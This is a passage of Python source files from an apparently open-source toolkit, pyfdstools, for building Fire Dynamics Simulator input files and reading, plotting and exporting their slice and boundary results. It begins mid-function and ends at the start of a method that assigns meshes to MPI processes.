clabel="%s (%s)"%(qty, unit),
cbarticks=[20, 40, 60, 80, 100, 120, 140])
datas2D['X'] = x
datas2D['Z'] = z
return datas2D, fig
def exampleReadSlcf3dResults(resultDir=None, chid=None,
fdsQuantities = ['TEMPERATURE'],
tStart=0, tEnd=120):
if (resultDir is None) and (chid is None):
systemPath = os.path.dirname(os.path.abspath(__file__))
chid = "case001"
resultDir = os.path.join(systemPath, "examples", "%s.zip"%(chid))
datas = defaultdict(bool)
for qty in fdsQuantities:
grid, data, times = fds.readSLCF3Ddata(chid, resultDir, qty)
tStartInd = np.argwhere(times >= tStart)[0][0]
tEndInd = np.argwhere(times <= tEnd)[-1][0]
data_tavg = np.nanmean(data[:, :, :, tStartInd:tEndInd], axis=3)
datas[qty] = data_tavg.copy()
datas['GRID'] = grid
datas['TIMES'] = times
return datas
def exampleExtract2dFromSlcf3d(datas,
fdsQuantities = ['TEMPERATURE'],
fdsUnits = ['C'],
axis=2, value=4.4,
qnty_mn=20, qnty_mx=150):
datas2D = defaultdict(bool)
for qty, unit in zip(fdsQuantities, fdsUnits):
x, z, data_slc = fds.findSliceLocation(datas['GRID'], datas[qty], axis, value)
datas2D[qty] = data_slc
fig = fds.plotSlice(x, z, data_slc, axis,
qnty_mn=qnty_mn, qnty_mx=qnty_mx,
clabel="%s (%s)"%(qty, unit),
cbarticks=[20, 40, 60, 80, 100, 120, 140])
datas2D['X'] = x
datas2D['Z'] = z
return datas2D, fig
def exampleImportBndf(resultDir=None, chid=None, fdsFile=None,
fdsQuantities = ['WALL TEMPERATURE'],
fdsUnits = ['C'],
tStart=0, tEnd=120,
axis=-2, value=4.4,
qnty_mn=20, qnty_mx=100):
if (resultDir is None) and (chid is None):
systemPath = os.path.dirname(os.path.abspath(__file__))
chid = "case001"
resultDir = os.path.join(systemPath, "examples", "%s.zip"%(chid))
if fdsFile is None: fdsFilePath = fds.getFileList(resultDir, chid, 'fds')[0]
datas, times = fds.queryBndf(resultDir, chid, fdsFilePath, fdsQuantities, fdsUnits, axis, value)
tStartInd = np.argwhere(times >= tStart)[0][0]
tEndInd = np.argwhere(times <= tEnd)[-1][0]
for qty, unit in zip(fdsQuantities, fdsUnits):
for mesh in list(datas[qty].keys()):
data = datas[qty]['DATA']
x = datas[qty]['X']
z = datas[qty]['Z']
meanData = np.mean(data[:, :, tStartInd:tEndInd], axis=2)
fig = fds.plotSlice(x, z, meanData, axis,
qnty_mn=qnty_mn, qnty_mx=qnty_mx,
clabel="%s (%s)"%(qty, unit),
cbarticks=[20, 40, 60, 80, 100, 120, 140])
return datas, fig
def exampleExtractBndfMax(resultDir=None, chid=None, outDir=None,
fdsFile=None, smvFile=None, outputNamespace=None,
fdsQuantities = ['WALL TEMPERATURE'], fdsUnits = ['C'],
tStart=0, tEnd=120, tInt=1, tBand=3, orientations=[0],
axis=-2, value=4.4,
qnty_mn=20, qnty_mx=100,
yticks=[20, 50, 100, 150, 200, 250, 300, 350]):
if (resultDir is None) and (chid is None) and (outDir is None):
systemPath = os.path.dirname(os.path.abspath(__file__))
chid = "case001"
resultDir = os.path.join(systemPath, "examples", "%s.zip"%(chid))
outDir = os.path.join(systemPath, "generated")
if fdsFile is None: fdsFilePath = fds.getFileList(resultDir, chid, 'fds')[0]
if smvFile is None: smvFilePath = fds.getFileList(resultDir, chid, 'smv')[0]
if outputNamespace is None: outputNamespace = "%s_max_"%(chid)
outputName = os.path.join(outDir, outputNamespace)
datas = fds.extractMaxBndfValues(fdsFilePath, smvFilePath, resultDir, chid, fdsQuantities,
tStart=tStart, tEnd=tEnd, tInt=tInt, tBand=tBand, orientations=orientations)
figs = []
for qty in fdsQuantities:
times = datas[qty]['TIMES']
mPts = datas[qty]['DATA']
names = datas[qty]['NAMES']
outName = "%s%s"%(outputName, qty)
fds.maxValueCSV(times, mPts, names, outName)
fig = fds.maxValuePlot(times, mPts, names, outName, vName=qty, yticks=yticks)
figs.append(fig)
return datas, figs
def example2dSliceToCsv(resultDir=None, outDir=None, chid=None,
quantity=None, unit=None, axis=None, value=None,
time=None, dt=None):
if (resultDir is None) and (chid is None) and (outDir is None):
systemPath = os.path.dirname(os.path.abspath(__file__))
chid = "case001"
resultDir = os.path.join(systemPath, "examples", "%s.zip"%(chid))
outDir = os.path.join(systemPath, "generated")
try:
os.mkdir(outDir)
except:
pass
data = fds.query2dAxisValue(resultDir, chid, quantity, axis, value, time=time, dt=dt)
fds.renderSliceCsvs(data, chid, outDir)
fig, ax = fds.plotSlice(data['x'], data['z'], data['datas'][:, :, -1], axis,
clabel="%s (%s)"%(quantity, unit))
fig.savefig(os.path.join(outDir, '%s_%s_%0.0f_%0.4f_final_frame.png'%(chid, quantity, axis, value)))
return data, fig
def runExamples():
systemPath = os.path.dirname(os.path.abspath(__file__))
exampleInputFdsFile = os.path.join(systemPath, "examples", "case001.fds")
exampleOutputDir = os.path.join(systemPath, "generated")
chid = "case001"
resultDir = os.path.join(systemPath, "examples", "%s.zip"%(chid))
print("Importing model example", flush=True)
file = exampleImportFile(exampleInputFdsFile)
print("Saving model example", flush=True)
exampleSaveFile(file=file, outdir=exampleOutputDir)
print("Plotting error example", flush=True)
exampleErrorCalculation()
print("Importing SLCF2D results example", flush=True)
datas = exampleReadSlcf2dResults(resultDir=resultDir, chid=chid)
print("Extracting slice from SLCF2D results example", flush=True)
datas2D, fig = exampleExtract2dFromSlcf2d(datas)
print("Importing SLCF3D results example", flush=True)
datas = exampleReadSlcf3dResults(resultDir=resultDir, chid=chid)
print("Extracting 2-D slice from SLCF3D results example", flush=True)
datas2D, fig = exampleExtract2dFromSlcf3d(datas)
print("Importing BNDF results example", flush=True)
datas, fig = exampleImportBndf(resultDir=resultDir, chid=chid)
print("Extracting max value from BNDF results example", flush=True)
datas, figs = exampleExtractBndfMax(resultDir=resultDir, chid=chid, outDir=exampleOutputDir)
print("Rendering 2d slice to csv example.", flush=True)
datas = example2dSliceToCsv(resultDir=resultDir, chid=chid, outDir=exampleOutputDir,
axis=1, value=2.45, time=30, dt=60, quantity='TEMPERATURE', unit='C')
if __name__ == '__main__':
runExamples()
```
#### File: johodges/pyfdstools/extractPolygon.py
```python
import numpy as np
import os
from collections import defaultdict
#from . import utilities as ut
from .fdsFileOperations import fdsFileOperations
from .utilities import in_hull, zreadlines, getFileList, pts2polygons
from .extractBoundaryData import linkBndfFileToMesh, loadBNDFdata_lessParams
from .smokeviewParser import parseSMVFile
def extractMaxBndfValues(fdsFilePath, smvFilePath, resultDir, chid, fdsQuantities,
tStart=0, tEnd=120, tInt=1, tBand=3, orientations=[0]):
fdsFile = fdsFileOperations()
fdsFile.importFile(fdsFilePath)
meshes = list(fdsFile.meshes.keys())
names = getPolygonNamesFromFdsFile(fdsFile)
linesSMV = zreadlines(smvFilePath)
points = parseFDSforPts(fdsFile, linesSMV, names, extend=[0,0,0])
polygons, numberOfGroups = pts2polygons(points)
bndfs = getFileList(resultDir, chid, 'bf')
bndf_dic = linkBndfFileToMesh(meshes, bndfs, fdsQuantities)
smvGrids, smvObsts, smvBndfs, smvSurfs = parseSMVFile(smvFilePath)
datas = defaultdict(bool)
for qty in fdsQuantities:
datas[qty] = defaultdict(bool)
times, mPts, orients = loadBNDFdata_lessParams(tStart, tEnd, tInt, tBand, bndf_dic[qty], smvGrids, smvObsts, orientations, polygons)
datas[qty]['TIMES'] = times
datas[qty]['NAMES'] = names
datas[qty]['DATA'] = mPts
return datas
def getPolygonNamesFromFdsFile(file):
names = []
obstList = list(file.obsts.keys())
if 'unknownCounter' in obstList: obstList.remove('unknownCounter')
for key in obstList:
if file.obsts[key]['BNDF_OBST']:
names.append(file.obsts[key]["ID"])
names = list(set(names))
return names
def parseFDSforPts(fileFDS, linesSMV, names, extend=[0,0,0]):
''' This routine parses an FDS file looking for a list of names and
stores a list of points defining polygons for each name which is
found.
The extend argument allows the polygon to be extended by a number of grid
cells. This is useful since FDS snaps obstructions to the grid which means
the actual coordinate location of the data from FDS may not align exactly
with the input file.
'''
smvObjs = []
for i in range(0,len(linesSMV)):
line2 = linesSMV[i]
if "GRID" in line2:
gridPts = [int(x) for x in linesSMV[i+1].replace('\n','').split()]
gridTRNX = np.array([[float(y) for y in x.replace('\n','').split()] for x in linesSMV[i+8:i+9+gridPts[0]]])
gridTRNY = np.array([[float(y) for y in x.replace('\n','').split()] for x in linesSMV[i+12+gridPts[0]:i+13+gridPts[0]+gridPts[1]]])
gridTRNZ = np.array([[float(y) for y in x.replace('\n','').split()] for x in linesSMV[i+16+gridPts[0]+gridPts[1]:i+17+gridPts[0]+gridPts[1]+gridPts[2]]])
dx = (gridTRNX.max()-gridTRNX.min())/(gridTRNX.shape[0]-1)
dy = (gridTRNY.max()-gridTRNY.min())/(gridTRNY.shape[0]-1)
dz = (gridTRNZ.max()-gridTRNZ.min())/(gridTRNZ.shape[0]-1)
if "OBST" in line2 and "HIDE_OBST" not in line2:
try:
numOBST = int(linesSMV[i+1].replace(' ',''))
except:
print(linesSMV[i-2:i+2])
assert False, "Stopped"
tmp1 = linesSMV[i+2:i+2+numOBST]
tmp2 = linesSMV[i+2+numOBST:i+2+numOBST+numOBST]
tmp1 = [x.replace('\n','') for x in tmp1]
tmp2 = [x.replace('\n','') for x in tmp2]
tmp1 = [[float(y) for y in x.split()] for x in tmp1]
tmp2 = [[float(y) for y in x.split()] for x in tmp2]
for i in range(0, len(tmp1)):
if len(tmp2[i]) > 8:
tmp2[i] = tmp2[i][:8]
smvObj = np.array([x1+x2 for x1, x2 in zip(tmp1,tmp2)])
for j in range(0,smvObj.shape[0]):
pts = smvObj[j,13:19]
x1 = gridTRNX[np.where(gridTRNX[:,0] == pts[0])[0][0],1]
x2 = gridTRNX[np.where(gridTRNX[:,0] == pts[1])[0][0],1]
y1 = gridTRNY[np.where(gridTRNY[:,0] == pts[2])[0][0],1]
y2 = gridTRNY[np.where(gridTRNY[:,0] == pts[3])[0][0],1]
z1 = gridTRNZ[np.where(gridTRNZ[:,0] == pts[4])[0][0],1]
z2 = gridTRNZ[np.where(gridTRNZ[:,0] == pts[5])[0][0],1]
newPts = np.array([x1,x2,y1,y2,z1,z2])
if newPts[0] == newPts[1]: newPts[1] = newPts[1] + dx
if newPts[2] == newPts[3]: newPts[3] = newPts[3] + dy
if newPts[4] == newPts[5]: newPts[5] = newPts[5] + dz
#print("Pre-snap:",smvObj[j,:6])
#print("Post-snap:",newPts)
smvObj[j,13:19] = newPts
if len(smvObjs) == 0:
smvObjs = smvObj
else:
smvObjs = np.append(smvObjs,smvObj,axis=0)
obstKeys = list(fileFDS.obsts.keys())
if 'unknownCounter' in obstKeys: obstKeys.remove('unknownCounter')
polygons = []
for name in names:
linkedPolygons = []
for key in obstKeys:
if name in fileFDS.obsts[key]['ID']:
coord = fileFDS.obsts[key]['XB']
snapInd = np.argmin(np.sum(abs(smvObjs[:,:6]-coord)**2,axis=1)**0.5)
snapPts = smvObjs[snapInd,13:19].copy()
pts = [[snapPts[0]-extend[0],snapPts[2]-extend[1],snapPts[4]-extend[2]],
[snapPts[0]-extend[0],snapPts[2]-extend[1],snapPts[5]+extend[2]],
[snapPts[0]-extend[0],snapPts[3]+extend[1],snapPts[4]-extend[2]],
[snapPts[0]-extend[0],snapPts[3]+extend[1],snapPts[5]+extend[2]],
[snapPts[1]+extend[0],snapPts[2]-extend[1],snapPts[4]-extend[2]],
[snapPts[1]+extend[0],snapPts[2]-extend[1],snapPts[5]+extend[2]],
[snapPts[1]+extend[0],snapPts[3]+extend[1],snapPts[4]-extend[2]],
[snapPts[1]+extend[0],snapPts[3]+extend[1],snapPts[5]+extend[2]]]
#print("Before snapping:",coord)
#print("After snapping:",newPts)
linkedPolygons.append(pts)
polygons.append(linkedPolygons)
return polygons
def parseFDSforVID(file,vName):
'''
'''
with open(file,'r') as f:
lines = f.readlines()
vIDCounter = 0
for line2 in lines:
line = line2.replace('/\n','')
if '&BNDF' in line:
vIDCounter = vIDCounter + 1
if vName in line:
vID = vIDCounter
return vID
def getCoordinateMasks(coords,polygons):
masks = np.zeros((coords.shape[0],len(polygons)))
for i in range(0,len(polygons)):
linkedpolygons = polygons[i]
for p in linkedpolygons:
masks[np.where(in_hull(coords,p.points)),i] = 1
return masks
def getCoordinateMasks2(coords,polygons):
masks = np.zeros((coords.shape[0],len(polygons)))
for i in range(0,len(polygons)):
linkedpolygons = polygons[i]
for p in linkedpolygons:
for j in range(0,coords.shape[0]):
if ut.pnt_in_cvex_hull(p, coords[j,:]):
masks[j,i] = 1
return masks
```
#### File: johodges/pyfdstools/fdsFileOperations.py
```python
import numpy as np
import pandas as pd
from collections import defaultdict
import datetime
import re
import scipy.spatial as scsp
import os
import zipfile
from .fdsTypes import fdsLineTypes
class fdsFileOperations(object):
"""
A class used to represent an FDS input file
...
Attributes
----------
bndfs : defaultdict
dictionary containing each key in the bndf namelist
ctrls : defaultdict
dictionary containing each key in the ctrl namelist
customLines : defaultdict
dictionary containing custom lines to be added to the input file
devcs : defaultdict
dictionary containing each key in the devc namelist
dump : defaultdict
dictionary containing each key in the dump namelist
head : defaultdict
dictionary containing each key in the head namelist
holes : defaultdict
dictionary containing each key in the hole namelist
inits : defaultdict
dictionary containing each key in the init namelist
matls : defaultdict
dictionary containing each key in the matl namelist
meshes : defaultdict
dictionary containing each key in the mesh namelist
meshOrder : defaultdict
dictionary containing the order meshes are to be defined in the
input file. This is an intermediate variable used after
assigning mpi processes to meshes.
misc : defaultdict
dictionary containing each key in the misc namelist
mpiProcesses : int
integer number of mpi processes to use when building the fds
input file.
obsts : defaultdict
dictionary containing each key in the obst namelist
pres : defaultdict
dictionary containing each key in the pres namelist
props : defaultdict
dictionary containing each key in the prop namelist
radis : defaultdict
dictionary containing each key in the radi namelist
ramps : defaultdict
dictionary containing each key in the ramp namelist
reacs : defaultdict
dictionary containing each key in the reac namelist
slcfs : defaultdict
dictionary containing each key in the slcf namelist
specs : defaultdict
dictionary containing each key in the spec namelist
surfs : defaultdict
dictionary containing each key in the surf namelist
time : defaultdict
dictionary containing each key in the time namelist
vents : defaultdict
dictionary containing each key in the vent namelist
version : str
string containing the fds version for the input file.
Syntax is '#.#.#'. Currently supports 6.7.1 and 6.7.4.
zones : defaultdict
dictionary containing each key in the zone namelist
Methods
-------
addBNDF(Qty, CELL_CENTERED=None)
Adds a bndf key to the bndfs namelist.
addCTRL(ID, FUNCTION_TYPE, INPUT_ID, DELAY=None)
Adds a ctrl key to the ctrls namelist.
addDEVC(ID, QUANTITY, XYZ=None, XB=None, IOR=None, SPEC_ID=None,
TIME_AVERAGED=None, SPATIAL_STATISTIC=None, STATISTICS=None,
INITIAL_STATE=None, INIT_ID=None, SETPOINT=None,
DUCT_ID=None, PROP_ID=None)
Adds a devc key to the devcs namelist.
addDUMP(RENDER_FILE=None, COLUMN_DUMP_LIMIT=False, WRITE_XYZ=False,
DT_PL3D=None, DT_SL3D=None, DT_SLCF=None, DT_BNDF=None,
DT_DEVC=None, DT_CTRL=None, DT_HRR=None, DT_RESTART=None)
Adds a dump key to the dump namelist.
addHEAD(chid, title=None)
Adds a head key to the head namelist.
addHOLE(ID, XB)
Adds a hole key to the holes namelist.
addMATL(ID, Emi=None, Den=None, Con=None, Spe=None, kramp=None,
cpramp=None, fyi=None)
Adds a matl key to the matls namelist.
addMESH(ID, IJK, XB)
Adds a mesh key to the meshes namelist.
addMISC(BNDF_DEFAULT=None, TMPA=None)
Adds a misc key to the misc namelist.
addMPIprocesses(numberOfProcesses, allowMeshSplitting=True,
splitMultiplier=1.20,
meshSplitAxes=[True, True, False])
Adds mpi processes to meshes. Can be used to automatically
split meshes to balance load on mpi processes.
addOBST(ID, XB, SURF_IDS=None, SURF_ID=None, SURF_ID6=None,
BNDF_OBST=True, THICKEN=None, TRANSPARENCY=None, COLOR=None)
Adds obst key to the obsts namelist.
addPRES(VELOCITY_TOLERANCE=None, MAX_PRESSURE_ITERATIONS=None)
Adds pres keys to the pres namelist.
addRAMP(ID, T, F)
Adds ramp keys to the ramps namelist.
addREAC(ID, FUEL=None, FORMULA=None, AIT=None, SY=None, COY=None,
HOC=None, C=None, H=None, O=None, N=None, FYI=None, RF=None)
Adds reac keys to the reacs namelist.
addSLCF(Qty, PBX=None, PBY=None, PBZ=None,
Vec=False, XB=None, SPEC_ID=None)
Adds slcf key to the slcfs namelist.
addSURF(ID, Mid=None, Col=None, Thi=None, Bac=None, Geo=None,
Fyi=None, Len=None, LeaPat=None, Hrrpua=None, qramp=None,
Rgb=None, adiabatic=False, VOLUME_FLOW=None, VEL_T=None)
Adds surf key to the surfs namelist.
addTIME(T_END=0.0, T_BEGIN=0.0)
Adds time key to the times namelist.
addVENT(ID, SURF_ID, XB=None, CTRL_ID=None, MB=None, IOR=None)
Adds vent key to the vents namelist.
addZONE(ID, XB, LEAK_AREA=None)
Adds zone key to the zones namelist.
calculateMeshCells()
Returns a list of mesh keys and number of cells in each mesh.
checkOverlappingMESH()
Returns True if any meshes are overlapping else False
dictFromLine(line, lineType, types)
Returns a dictionary with keys and values from a namelist line.
dictMerge(template, master, path=None)
Returns merged dictionary where keys in master overwrite keys
in template.
generateFDStext()
Returns str of input file.
getDefaultFields()
Returns default field order.
getLineType(line)
Returns namelist key from str line.
getMeshLimits()
Returns a dictionary containing a key 'XB' with an array of the
total extents defined in meshes.
getNewlineFromTypes()
Returns a dictionary containing default new line parameters.
getPolygonNamesFromFdsFile()
Returns a list of polygons defined in the fds input file.
importFile(file=None, text=None, textList=None)
Adds keys to each namelist from an input file, text, or text
list.
interpretKey(key, lineType, types)
Intermediate function which processes a key from a namelist
key pair to returns the keyID, keyType, and keyValue.
keyAssist(text, types, dic, internalKeys=['counter'], newline=False)
Returns a namelist text line based on an input dictionary and
type dictionary.
keyFromLineType(lineType)
Returns internal attribute name from namelist type.
makeFDSLines(textFDS)
Returns a list of namelist lines.
makeLinesFromDict(items, types, prefix, newline=False)
Returns a str generated from a namelist dictionary.
makeMESH(meshes, meshTypes, meshOrder=False)
Returns a str generated from a meshes namelist dictionary.
makeRAMP(ramps)
Returns a str generated from a ramps namelist dictionary.
mergeTypeFromLineType(lineType)
Returns internal merge type based on namelist type.
parseFDSLines(lines)
Adds each line to internal attribute namelist dictionaries.
parseLine(line, lineType, types, key)
Adds one line to the corresponding internal attribute namelist
dictionary.
saveModel(mpiProcesses, location, allowMeshSplitting=True,
splitMultiplier=1.2)
Saves an fds input file based on internal attribute namelist
dictionaries. Allows splitting of meshes to optimize mpi
processes balance.
splitLineIntoKeys(line2)
Returns namelist key pairs from a line.
splitMESHonce(mesh)
Splits a mesh along its largest axis.
zopen(file)
Opens a file or zip archive for reading.
"""
def __init__(self, version="6.7.4"):
"""
Parameters
----------
version : str
string containing the fds version for the input file.
Syntax is '#.#.#'. Currently supports 6.7.1 and 6.7.4.
"""
self.head = defaultdict(bool)
self.devcs = defaultdict(bool)
self.inits = defaultdict(bool)
self.obsts = defaultdict(bool)
self.holes = defaultdict(bool)
self.vents = defaultdict(bool)
self.surfs = defaultdict(bool)
self.ramps = defaultdict(bool)
self.ctrls = defaultdict(bool)
self.meshes = defaultdict(bool)
self.slcfs = defaultdict(bool)
self.bndfs = defaultdict(bool)
self.time = defaultdict(bool)
self.dump = defaultdict(bool)
self.misc = defaultdict(bool)
self.zones = defaultdict(bool)
self.reacs = defaultdict(bool)
self.matls = defaultdict(bool)
self.radis = defaultdict(bool)
self.pres = defaultdict(bool)
self.parts = defaultdict(bool)
self.profs = defaultdict(bool)
self.props = defaultdict(bool)
self.specs = defaultdict(bool)
self.winds = defaultdict(bool)
self.customLines = []
self.devcs['unknownCounter'] = 0
self.obsts['unknownCounter'] = 0
self.holes['unknownCounter'] = 0
self.vents['unknownCounter'] = 0
self.meshes['unknownCounter'] = 0
self.slcfs['unknownCounter'] = 0
self.bndfs['unknownCounter'] = 0
self.profs['unknownCounter'] = 0
self.meshOrder = False
self.version = version
def addBNDF(self, QUANTITY, CELL_CENTERED=None):
"""Adds a bndf key to internal attribute bndfs
Adds a bndf key to internal attribte bndfs. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
QUANTITY : str
Quantity of the bndf
CELL_CENTERED : bool, optional
Flag specifying if the quantity should be exported at cell
centers or at cell edges (default None).
"""
bndf = defaultdict(bool)
bndf['ID'] = "BNDF-%05.0f"%(self.bndfs['unknownCounter'])
bndf['QUANTITY'] = QUANTITY
if CELL_CENTERED != None: bndf['CELL_CENTERED'] = CELL_CENTERED
self.bndfs['unknownCounter'] += 1
self.bndfs[bndf['ID']] = bndf
def addCTRL(self, ID, FUNCTION_TYPE, INPUT_ID, DELAY=None,
CONSTANT=None, RAMP_ID=None):
"""Adds a ctrl key to internal attribute ctrls
Adds a bndf key to internal attribte ctrls. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
ID : str
Identifier for this control
FUNCTION_TYPE : str
Identify for type of control.
Valid entries are: ANY, ALL
INPUT_ID : str
Identifier for device or control for logic.
DELAY : float, optional
Time delay for activation of control (default None)
CONSTANT : float, optional
Value for constant defined in input id
RAMP_ID : str, optional
Name of ramp to be used to map control output
"""
ctrl = defaultdict(bool)
ctrl['ID'] = ID
ctrl['FUNCTION_TYPE'] = FUNCTION_TYPE
ctrl['INPUT_ID'] = INPUT_ID
if DELAY != None: ctrl['DELAY'] = DELAY
if CONSTANT != None: ctrl['CONSTANT'] = CONSTANT
if RAMP_ID != None: ctrl['RAMP_ID'] = RAMP_ID
self.ctrls[ID] = ctrl
def addDEVC(self, ID, QUANTITY, XYZ=None, XB=None, IOR=None,
SPEC_ID=None, TIME_AVERAGED=None,
SPATIAL_STATISTIC=None, STATISTICS=None,
INITIAL_STATE=None, INIT_ID=None, SETPOINT=None,
DUCT_ID=None, NO_UPDATE_DEVC_ID=None, CTRL_ID=None,
PROP_ID=None, MATL_ID=None):
"""Adds a devc key to internal attribute devcs
Adds a devc key to internal attribte devcs. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
ID : str
Identifier for this device
QUANTITY : str
Quantity of the device
XYZ : float array(3), optional
Three component array containing X, Y, Z coordinates
(default None)
XB : float array(6), optional
Six component array containing X_min, X_max, Y_min, Y_max,
Z_min, Z_max coordinates (default None)
IOR : int, optional
Integer specifying the orientation of the device
(default None)
SPEC_ID : str, optional
String specifying the species of the device (default None)
TIME_AVERAGED : bool, optional
Flag specifying if the device is time averaged
(default None)
SPATIAL_STATISTIC : str, optional
String specifying spatial statistic of the device
(default None)
STATISTICS : str, optional
String specifying statistic type
INITIAL_STATE : bool, optional
Flag specifying if device is initially active (defualt None)
INIT_ID : str, optional
String specifying init namelist identifier
SETPOINT : float, optional
Flag value used to determine activation of device
(default None)
DUCT_ID : str, optional
String identifier of duct containing device
NO_UPDATE_DEVC_ID : str, optional
String identifier of device activation to stop updating
CTRL_ID : str, optional
String identifier of control for device
PROP_ID : str, optional
String identifier of properties for device
MATL_ID : str, optional
String identifier for material properties for device
"""
devc = defaultdict(bool)
devc['ID'] = ID
devc['QUANTITY'] = QUANTITY
if XYZ != None:
if type(XYZ) is list: XYZ = np.array(XYZ)
devc['XYZ'] = XYZ
if XB != None:
if type(XB) is list: XB = np.array(XB)
devc['XB'] = XB
if INITIAL_STATE != None: devc['INITIAL_STATE'] = INITIAL_STATE
if INIT_ID != None: devc['INIT_ID'] = INIT_ID
if SETPOINT != None: devc['SETPOINT'] = SETPOINT
if IOR != None: devc['IOR'] = IOR
if TIME_AVERAGED != None: devc['TIME_AVERAGED'] = TIME_AVERAGED
if SPATIAL_STATISTIC != None:
devc['SPATIAL_STATISTIC'] = SPATIAL_STATISTIC
if STATISTICS != None: devc["STATISTICS"] = STATISTICS
if DUCT_ID != None: devc['DUCT_ID'] = DUCT_ID
if SPEC_ID != None: devc['SPEC_ID'] = SPEC_ID
if NO_UPDATE_DEVC_ID != None: devc['NO_UPDATE_DEVC_ID'] = NO_UPDATE_DEVC_ID
if CTRL_ID != None: devc['CTRL_ID'] = CTRL_ID
if SETPOINT != None: devc['SETPOINT'] = SETPOINT
if PROP_ID != None: devc['PROP_ID'] = PROP_ID
if MATL_ID != None: devc['MATL_ID'] = MATL_ID
self.devcs[ID] = devc
def addDUMP(self, RENDER_FILE=None, COLUMN_DUMP_LIMIT=False,
WRITE_XYZ=False, DT_PL3D=None, DT_SL3D=None,
DT_SLCF=None, DT_BNDF=None, DT_DEVC=None, DT_CTRL=None,
DT_HRR=None, DT_RESTART=None):
"""Adds a dump key to internal attribute dumps
Adds a dump key to internal attribute dumps. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
RENDER_FILE : str, optional
Filename for render file (default None)
COLUMN_DUMP_LIMIT : bool, optional
Flag specifying if number of columns in CSV file should be
limited (default False)
WRITE_XYZ : bool, optional
Flag specifying if an XYZ file should be generated by FDS
(default False)
DT_PL3D : float, optional
Time interval to output PL3D data (default None)
DT_SL3D : float, optional
Time interval to output SL3D data (default None)
DT_SLCF : float, optional
Time interval to output SLCF data (default None)
DT_BNDF : float, optional
Time interval to output BNDF data (default None)
DT_DEVC : float, optional
Time interval to output DEVC data (default None)
DT_CTRL : float, optional
Time interval to output CTRL data (default None)
DT_HRR : float, optional
Time interval to output HRR data (default None)
DT_RESTART : float, optional
Time interval to save restart files (default None)
"""
dump = defaultdict(bool)
if RENDER_FILE != None: dump['RENDER_FILE'] = RENDER_FILE
if COLUMN_DUMP_LIMIT:
dump['COLUMN_DUMP_LIMIT'] = COLUMN_DUMP_LIMIT
if WRITE_XYZ: dump['WRITE_XYZ'] = WRITE_XYZ
if DT_PL3D != None: dump['DT_PL3D'] = DT_PL3D
if DT_SL3D != None: dump['DT_SL3D'] = DT_SL3D
if DT_SLCF != None: dump['DT_SLCF'] = DT_SLCF
if DT_BNDF != None: dump['DT_BNDF'] = DT_BNDF
if DT_DEVC != None: dump['DT_DEVC'] = DT_DEVC
if DT_CTRL != None: dump['DT_CTRL'] = DT_CTRL
if DT_HRR != None: dump['DT_HRR'] = DT_HRR
if DT_RESTART != None: dump['DT_RESTART'] = DT_RESTART
self.dump['ID'] = dump
def addHEAD(self, chid, title=None):
"""Adds a head key to internal attribute head
Adds a head key to internal attribute head. Note if no title is
specified, title will be set to the same as chid.
Parameters
----------
chid: str
Chid for use in the input file
title: str, optional
Title for use in the input file (default None)
"""
head = defaultdict(bool)
head['CHID'] = chid
if title != None:
head['TITLE'] = title
else:
head['TITLE'] = chid
self.head['ID'] = head
def addHOLE(self, ID, XB):
"""Adds a hole key to internal attribute holes
Adds a hole key to internal attribute holes.
Parameters
----------
ID : str
String identifier for the hole
XB : float array(6)
Six component array containing X_min, X_max, Y_min, Y_max,
Z_min, Z_max coordinates
"""
hole = defaultdict(bool)
hole['XB'] = XB
hole['ID'] = ID
self.holes[ID] = hole
def addMATL(self, ID, Emi=None, Den=None, Con=None, Spe=None,
kramp=None, cpramp=None, fyi=None):
"""Adds a matl key to internal attribute matls
Adds a matl key to internal attribute matls. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
ID : str
String identifier for the material
Emi : float, optional
Emissivity of the material (default None)
Den : float, optional
Density of the material (default None)
Con : float, optional
Conductivity of the material (default None)
Spe : float, optional
kramp : str, optional
String identifier of thermal conductivity ramp
(default None)
cpramp : str, optional
String identifier of specific heat capacity ramp
(default None)
fyi : str, optional
String containing comment field to be included in input file
(default None)
"""
matl = defaultdict(bool)
matl['ID'] = ID
if Emi != None: matl['EMISSIVITY'] = Emi
if Den != None: matl['DENSITY'] = Den
if Con != None: matl['CONDUCTIVITY'] = Con
if Spe != None: matl['SPECIFIC_HEAT'] = Spe
if kramp != None: matl['CONDUCTIVITY_RAMP'] = kramp
if cpramp != None: matl['SPECIFIC_HEAT_RAMP'] = cpramp
if fyi != None: matl['FYI'] = fyi
self.matls[ID] = matl
def addMESH(self, ID, IJK, XB):
"""Adds a mesh key to internal attribute meshes
Adds a mesh key to internal attribute meshes.
Parameters
----------
ID : str
String identifier for the mesh
IJK : int array(3)
Three component array containing number of grid cells in
each axis
XB : float array(6)
Six component array containing X_min, X_max, Y_min, Y_max,
Z_min, Z_max coordinates
"""
mesh = defaultdict(bool)
if type(IJK) is list: IJK = np.array(IJK)
if type(XB) is list: XB = np.array(XB)
mesh['ID'] = ID
mesh['IJK'] = IJK
mesh['XB'] = XB
self.meshes[ID] = mesh
def addMISC(self, BNDF_DEFAULT=None, TMPA=None):
"""Adds a misc key to internal attribute misc
Adds a misc key to internal attribute misc. Optional parameters
that are specified as None will not be explicitly specified in
a generated input file. These values at runtime will default to
current FDS default parameters.
Parameters
----------
BNDF_DEFAULT : bool
Flag specifying if boundary data is to be output for all
boundary surfaces by default (default None)
TMPA : float
Ambient air temperature
"""
misc = defaultdict(bool)
if BNDF_DEFAULT != None: misc['BNDF_DEFAULT'] = BNDF_DEFAULT
if TMPA != None: misc['TMPA'] = TMPA
self.misc['ID'] = misc
def calculateCellsPerProcess(self):
"""Calculates the number of cells per mpi process based on
information stored in internal attributes
"""
meshes, numCells = self.calculateMeshCells()
numProcesses = self.mpiProcesses
IdealCellsPerProcess = np.sum(numCells)/numProcesses
cellsPerProcess = np.zeros((numProcesses,))
for i, mesh in enumerate(meshes):
process = int(self.meshes[mesh]['MPI_PROCESS'])
cellsPerProcess[process] += numCells[i]
return IdealCellsPerProcess, cellsPerProcess
def addMPIprocesses(self, numberOfProcesses,
allowMeshSplitting=True, splitMultiplier=1.20,
meshSplitAxes=[True, True, False]):
